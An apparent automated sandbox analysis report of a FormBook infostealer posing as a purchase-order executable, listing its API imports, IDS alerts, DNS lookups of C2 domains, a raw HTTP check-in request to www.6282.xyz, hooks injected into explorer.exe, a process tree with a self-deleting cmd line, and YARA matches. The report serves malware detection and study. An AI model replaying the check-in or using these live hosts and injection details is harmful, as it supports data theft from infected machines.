EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken
--- | ---
English | Great Britain
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
--- | --- | --- | --- | --- | --- | --- | --- | ---
2024-11-04T15:28:16.536065+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.5 | 49704 | TCP
2024-11-04T15:28:55.195375+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.5 | 49895 | TCP
2024-11-04T15:29:02.927018+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.5 | 49943 | 156.235.1.30 | 80 | TCP
2024-11-04T15:29:02.927018+0100 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.5 | 49943 | 156.235.1.30 | 80 | TCP
2024-11-04T15:29:02.927018+0100 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.5 | 49943 | 156.235.1.30 | 80 | TCP
2024-11-04T15:30:04.960785+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.5 | 49977 | 199.59.243.227 | 80 | TCP
2024-11-04T15:30:04.960785+0100 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.5 | 49977 | 199.59.243.227 | 80 | TCP
2024-11-04T15:30:04.960785+0100 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.5 | 49977 | 199.59.243.227 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
--- | --- | --- | --- | ---
Nov 4, 2024 15:29:02.248311043 CET | 49943 | 80 | 192.168.2.5 | 156.235.1.30
Nov 4, 2024 15:29:02.253279924 CET | 80 | 49943 | 156.235.1.30 | 192.168.2.5
Nov 4, 2024 15:29:02.253354073 CET | 49943 | 80 | 192.168.2.5 | 156.235.1.30
Nov 4, 2024 15:29:02.253401041 CET | 49943 | 80 | 192.168.2.5 | 156.235.1.30
Nov 4, 2024 15:29:02.258485079 CET | 80 | 49943 | 156.235.1.30 | 192.168.2.5
Nov 4, 2024 15:29:02.751633883 CET | 49943 | 80 | 192.168.2.5 | 156.235.1.30
Nov 4, 2024 15:29:02.800196886 CET | 80 | 49943 | 156.235.1.30 | 192.168.2.5
Nov 4, 2024 15:29:02.926904917 CET | 80 | 49943 | 156.235.1.30 | 192.168.2.5
Nov 4, 2024 15:29:02.927017927 CET | 49943 | 80 | 192.168.2.5 | 156.235.1.30
Timestamp | Source Port | Dest Port | Source IP | Dest IP
--- | --- | --- | --- | ---
Nov 4, 2024 15:28:41.628223896 CET | 52242 | 53 | 192.168.2.5 | 1.1.1.1
Nov 4, 2024 15:28:41.650876999 CET | 53 | 52242 | 1.1.1.1 | 192.168.2.5
Nov 4, 2024 15:29:01.861790895 CET | 61943 | 53 | 192.168.2.5 | 1.1.1.1
Nov 4, 2024 15:29:02.247543097 CET | 53 | 61943 | 1.1.1.1 | 192.168.2.5
Nov 4, 2024 15:29:22.800858974 CET | 65035 | 53 | 192.168.2.5 | 1.1.1.1
Nov 4, 2024 15:29:22.895337105 CET | 53 | 65035 | 1.1.1.1 | 192.168.2.5
Nov 4, 2024 15:29:42.926250935 CET | 62535 | 53 | 192.168.2.5 | 1.1.1.1
Nov 4, 2024 15:29:43.019112110 CET | 53 | 62535 | 1.1.1.1 | 192.168.2.5
Nov 4, 2024 15:30:04.415518999 CET | 63970 | 53 | 192.168.2.5 | 1.1.1.1
Nov 4, 2024 15:30:04.455940008 CET | 53 | 63970 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
--- | --- | --- | --- | --- | --- | --- | --- | ---
Nov 4, 2024 15:28:41.628223896 CET | 192.168.2.5 | 1.1.1.1 | 0x6adf | Standard query (0) | www.sfmoreservicesllc.lat | A (IP address) | IN (0x0001) | false
Nov 4, 2024 15:29:01.861790895 CET | 192.168.2.5 | 1.1.1.1 | 0x7293 | Standard query (0) | www.6282.xyz | A (IP address) | IN (0x0001) | false
Nov 4, 2024 15:29:22.800858974 CET | 192.168.2.5 | 1.1.1.1 | 0x62b0 | Standard query (0) | www.ostcanadantpl.top | A (IP address) | IN (0x0001) | false
Nov 4, 2024 15:29:42.926250935 CET | 192.168.2.5 | 1.1.1.1 | 0x71cf | Standard query (0) | www.rkgexg.top | A (IP address) | IN (0x0001) | false
Nov 4, 2024 15:30:04.415518999 CET | 192.168.2.5 | 1.1.1.1 | 0x47cc | Standard query (0) | www.9net88.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Nov 4, 2024 15:28:41.650876999 CET | 1.1.1.1 | 192.168.2.5 | 0x6adf | Name error (3) | www.sfmoreservicesllc.lat | none | none | A (IP address) | IN (0x0001) | false
Nov 4, 2024 15:29:02.247543097 CET | 1.1.1.1 | 192.168.2.5 | 0x7293 | No error (0) | www.6282.xyz | | 156.235.1.30 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 15:29:22.895337105 CET | 1.1.1.1 | 192.168.2.5 | 0x62b0 | Name error (3) | www.ostcanadantpl.top | none | none | A (IP address) | IN (0x0001) | false
Nov 4, 2024 15:29:43.019112110 CET | 1.1.1.1 | 192.168.2.5 | 0x71cf | Name error (3) | www.rkgexg.top | none | none | A (IP address) | IN (0x0001) | false
Nov 4, 2024 15:30:04.455940008 CET | 1.1.1.1 | 192.168.2.5 | 0x47cc | No error (0) | www.9net88.net | 94950.bodis.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 4, 2024 15:30:04.455940008 CET | 1.1.1.1 | 192.168.2.5 | 0x47cc | No error (0) | 94950.bodis.com | | 199.59.243.227 | A (IP address) | IN (0x0001) | false
• www.6282.xyz

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
--- | --- | --- | --- | --- | --- | ---
0 | 192.168.2.5 | 49943 | 156.235.1.30 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp: Nov 4, 2024 15:29:02.253401041 CET
Bytes transferred: 166
Direction: OUT
Data:
GET /ge07/?VN9H=FOymHjEy8INtRP80ztKDHy+SkTRNuxtAsSGbgkPqAuR0sH6nXW9AVXeVOt+ErvTzet/o&H0Gx7d=DzrdohnPa4vXCBq HTTP/1.1
Host: www.6282.xyz
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Code Manipulations

Function Name | Hook Type | Active in Processes
--- | --- | ---
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Function Name | Hook Type | New Data
--- | --- | ---
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE0
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE0
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE0
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE0

Target ID: 0
Start time: 09:27:56
Start date: 04/11/2024
Path: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe"
Imagebase: 0x400000
File size: 1'312'891 bytes
MD5 hash: 85C1C3E112A22E4F23EAF97D86FEF355
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low
Has exited: true

Target ID: 2
Start time: 09:27:57
Start date: 04/11/2024
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe"
Imagebase: 0x320000
File size: 46'504 bytes
MD5 hash: 1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high
Has exited: true

Target ID: 3
Start time: 09:27:58
Start date: 04/11/2024
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff674740000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 4
Start time: 09:28:06
Start date: 04/11/2024
Path: C:\Windows\SysWOW64\autochk.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\SysWOW64\autochk.exe"
Imagebase: 0x2d0000
File size: 863'232 bytes
MD5 hash: FC398299F54290D5F35C69E865FD7CC2
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 5
Start time: 09:28:12
Start date: 04/11/2024
Path: C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\ipconfig.exe"
Imagebase: 0xcb0000
File size: 29'184 bytes
                                                          MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:6
                                                          Start time:09:28:12
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
                                                          Imagebase:0x790000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:09:28:12
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true


                                                            Execution Graph

                                                            Execution Coverage:3.4%
                                                            Dynamic/Decrypted Code Coverage:0.5%
                                                            Signature Coverage:8.8%
                                                            Total number of Nodes:1998
                                                            Total number of Limit Nodes:35
86999->87002 87000 452a9d 87003 413748 _free 46 API calls 87000->87003 87001->86888 87002->86888 87003->87001 87005 431e64 87004->87005 87006 431e6a 87004->87006 87007 414a46 __fcloseall 82 API calls 87005->87007 87006->86889 87007->87006 87009 425de2 87008->87009 87013 40f6fc _wcslen 87008->87013 87009->86950 87010 40f710 WideCharToMultiByte 87011 40f756 87010->87011 87012 40f728 87010->87012 87011->86950 87014 4115d7 52 API calls 87012->87014 87013->87010 87015 40f735 WideCharToMultiByte 87014->87015 87015->86950 87018 40f85d __call_reportfault _strlen 87016->87018 87017 426b3b 87018->87017 87020 40f7ab 87018->87020 87065 414db8 87018->87065 87021 4149c2 87020->87021 87080 414904 87021->87080 87023 40f7e9 87023->86955 87024 40f5c0 87023->87024 87025 40f5cd _strcat __write_nolock _memmove 87024->87025 87026 414d04 __fread_nolock 61 API calls 87025->87026 87028 425d11 87025->87028 87032 40f691 __tzset_nolock 87025->87032 87168 4150d1 87025->87168 87026->87025 87029 4150d1 _fseek 81 API calls 87028->87029 87030 425d33 87029->87030 87031 414d04 __fread_nolock 61 API calls 87030->87031 87031->87032 87032->86957 87034 414a52 _fseek 87033->87034 87035 414a64 87034->87035 87036 414a79 87034->87036 87308 417f77 46 API calls __getptd_noexit 87035->87308 87038 415471 __lock_file 47 API calls 87036->87038 87042 414a74 _fseek 87036->87042 87040 414a92 87038->87040 87039 414a69 87309 417f25 10 API calls __fclose_nolock 87039->87309 87292 4149d9 87040->87292 87042->86963 87377 414c76 87046->87377 87048 414d1c 87049 44afef 87048->87049 87545 442c5a 87049->87545 87051 44b00d 87051->86964 87053 414fee _fseek 87052->87053 87054 414ffa 87053->87054 87055 41500f 87053->87055 87549 417f77 46 API calls __getptd_noexit 87054->87549 87057 415471 __lock_file 47 API calls 87055->87057 87059 415017 87057->87059 87058 414fff 87550 417f25 10 API calls __fclose_nolock 87058->87550 87061 414e4e __ftell_nolock 51 API calls 87059->87061 87062 415024 87061->87062 87551 41503d LeaveCriticalSection 
LeaveCriticalSection __wfsopen 87062->87551 87063 41500a _fseek 87063->86966 87066 414dd6 87065->87066 87067 414deb 87065->87067 87076 417f77 46 API calls __getptd_noexit 87066->87076 87067->87066 87069 414df2 87067->87069 87078 41b91b 79 API calls 11 library calls 87069->87078 87070 414ddb 87077 417f25 10 API calls __fclose_nolock 87070->87077 87073 414e18 87074 414de6 87073->87074 87079 418f98 77 API calls 5 library calls 87073->87079 87074->87018 87076->87070 87077->87074 87078->87073 87079->87074 87083 414910 _fseek 87080->87083 87081 414923 87136 417f77 46 API calls __getptd_noexit 87081->87136 87083->87081 87085 414951 87083->87085 87084 414928 87137 417f25 10 API calls __fclose_nolock 87084->87137 87099 41d4d1 87085->87099 87088 414956 87089 41496a 87088->87089 87090 41495d 87088->87090 87092 414992 87089->87092 87093 414972 87089->87093 87138 417f77 46 API calls __getptd_noexit 87090->87138 87116 41d218 87092->87116 87139 417f77 46 API calls __getptd_noexit 87093->87139 87096 414933 _fseek @_EH4_CallFilterFunc@8 87096->87023 87100 41d4dd _fseek 87099->87100 87101 4182cb __lock 46 API calls 87100->87101 87114 41d4eb 87101->87114 87102 41d560 87141 41d5fb 87102->87141 87103 41d567 87104 416b04 __malloc_crt 46 API calls 87103->87104 87106 41d56e 87104->87106 87106->87102 87108 41d57c InitializeCriticalSectionAndSpinCount 87106->87108 87107 41d5f0 _fseek 87107->87088 87109 41d59c 87108->87109 87110 41d5af EnterCriticalSection 87108->87110 87113 413748 _free 46 API calls 87109->87113 87110->87102 87111 418209 __mtinitlocknum 46 API calls 87111->87114 87113->87102 87114->87102 87114->87103 87114->87111 87144 4154b2 47 API calls __lock 87114->87144 87145 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87114->87145 87117 41d23a 87116->87117 87118 41d255 87117->87118 87130 41d26c __wopenfile 87117->87130 87150 417f77 46 API calls __getptd_noexit 87118->87150 87120 41d421 87123 41d47a 87120->87123 87124 41d48c 87120->87124 87121 41d25a 87151 417f25 10 API 
calls __fclose_nolock 87121->87151 87155 417f77 46 API calls __getptd_noexit 87123->87155 87147 422bf9 87124->87147 87127 41499d 87140 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 87127->87140 87128 41d47f 87156 417f25 10 API calls __fclose_nolock 87128->87156 87130->87120 87130->87123 87152 41341f 58 API calls 2 library calls 87130->87152 87132 41d41a 87132->87120 87153 41341f 58 API calls 2 library calls 87132->87153 87134 41d439 87134->87120 87154 41341f 58 API calls 2 library calls 87134->87154 87136->87084 87137->87096 87138->87096 87139->87096 87140->87096 87146 4181f2 LeaveCriticalSection 87141->87146 87143 41d602 87143->87107 87144->87114 87145->87114 87146->87143 87157 422b35 87147->87157 87149 422c14 87149->87127 87150->87121 87151->87127 87152->87132 87153->87134 87154->87120 87155->87128 87156->87127 87159 422b41 _fseek 87157->87159 87158 422b54 87160 417f77 __fclose_nolock 46 API calls 87158->87160 87159->87158 87161 422b8a 87159->87161 87162 422b59 87160->87162 87164 422400 __tsopen_nolock 109 API calls 87161->87164 87163 417f25 __fclose_nolock 10 API calls 87162->87163 87167 422b63 _fseek 87163->87167 87165 422ba4 87164->87165 87166 422bcb __wsopen_helper LeaveCriticalSection 87165->87166 87166->87167 87167->87149 87171 4150dd _fseek 87168->87171 87169 4150e9 87199 417f77 46 API calls __getptd_noexit 87169->87199 87171->87169 87172 41510f 87171->87172 87181 415471 87172->87181 87173 4150ee 87200 417f25 10 API calls __fclose_nolock 87173->87200 87180 4150f9 _fseek 87180->87025 87182 415483 87181->87182 87183 4154a5 EnterCriticalSection 87181->87183 87182->87183 87184 41548b 87182->87184 87185 415117 87183->87185 87186 4182cb __lock 46 API calls 87184->87186 87187 415047 87185->87187 87186->87185 87188 415067 87187->87188 87189 415057 87187->87189 87191 415079 87188->87191 87202 414e4e 87188->87202 87257 417f77 46 API calls __getptd_noexit 87189->87257 87219 41443c 87191->87219 87196 4150b9 87232 41e1f4 87196->87232 87198 41505c 87201 
415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 87198->87201 87199->87173 87200->87180 87201->87180 87203 414e61 87202->87203 87204 414e79 87202->87204 87258 417f77 46 API calls __getptd_noexit 87203->87258 87205 414139 __fclose_nolock 46 API calls 87204->87205 87207 414e80 87205->87207 87210 41e1f4 __write 51 API calls 87207->87210 87208 414e66 87259 417f25 10 API calls __fclose_nolock 87208->87259 87211 414e97 87210->87211 87212 414f09 87211->87212 87214 414ec9 87211->87214 87218 414e71 87211->87218 87260 417f77 46 API calls __getptd_noexit 87212->87260 87215 41e1f4 __write 51 API calls 87214->87215 87214->87218 87216 414f64 87215->87216 87217 41e1f4 __write 51 API calls 87216->87217 87216->87218 87217->87218 87218->87191 87220 414477 87219->87220 87221 414455 87219->87221 87225 414139 87220->87225 87221->87220 87222 414139 __fclose_nolock 46 API calls 87221->87222 87223 414470 87222->87223 87261 41b7b2 77 API calls 6 library calls 87223->87261 87226 414145 87225->87226 87227 41415a 87225->87227 87262 417f77 46 API calls __getptd_noexit 87226->87262 87227->87196 87229 41414a 87263 417f25 10 API calls __fclose_nolock 87229->87263 87231 414155 87231->87196 87233 41e200 _fseek 87232->87233 87234 41e223 87233->87234 87235 41e208 87233->87235 87237 41e22f 87234->87237 87240 41e269 87234->87240 87284 417f8a 46 API calls __getptd_noexit 87235->87284 87286 417f8a 46 API calls __getptd_noexit 87237->87286 87238 41e20d 87285 417f77 46 API calls __getptd_noexit 87238->87285 87264 41ae56 87240->87264 87242 41e234 87287 417f77 46 API calls __getptd_noexit 87242->87287 87245 41e26f 87247 41e291 87245->87247 87248 41e27d 87245->87248 87246 41e23c 87288 417f25 10 API calls __fclose_nolock 87246->87288 87289 417f77 46 API calls __getptd_noexit 87247->87289 87274 41e17f 87248->87274 87252 41e215 _fseek 87252->87198 87253 41e289 87291 41e2c0 LeaveCriticalSection __unlock_fhandle 87253->87291 87254 41e296 87290 417f8a 46 API calls __getptd_noexit 87254->87290 87257->87198 
87258->87208 87259->87218 87260->87218 87261->87220 87262->87229 87263->87231 87265 41ae62 _fseek 87264->87265 87266 41aebc 87265->87266 87267 4182cb __lock 46 API calls 87265->87267 87268 41aec1 EnterCriticalSection 87266->87268 87269 41aede _fseek 87266->87269 87270 41ae8e 87267->87270 87268->87269 87269->87245 87271 41aeaa 87270->87271 87272 41ae97 InitializeCriticalSectionAndSpinCount 87270->87272 87273 41aeec ___lock_fhandle LeaveCriticalSection 87271->87273 87272->87271 87273->87266 87275 41aded __lseek_nolock 46 API calls 87274->87275 87276 41e18e 87275->87276 87277 41e1a4 SetFilePointer 87276->87277 87278 41e194 87276->87278 87279 41e1c3 87277->87279 87280 41e1bb GetLastError 87277->87280 87281 417f77 __fclose_nolock 46 API calls 87278->87281 87282 41e199 87279->87282 87283 417f9d __dosmaperr 46 API calls 87279->87283 87280->87279 87281->87282 87282->87253 87283->87282 87284->87238 87285->87252 87286->87242 87287->87246 87288->87252 87289->87254 87290->87253 87291->87252 87293 4149ea 87292->87293 87294 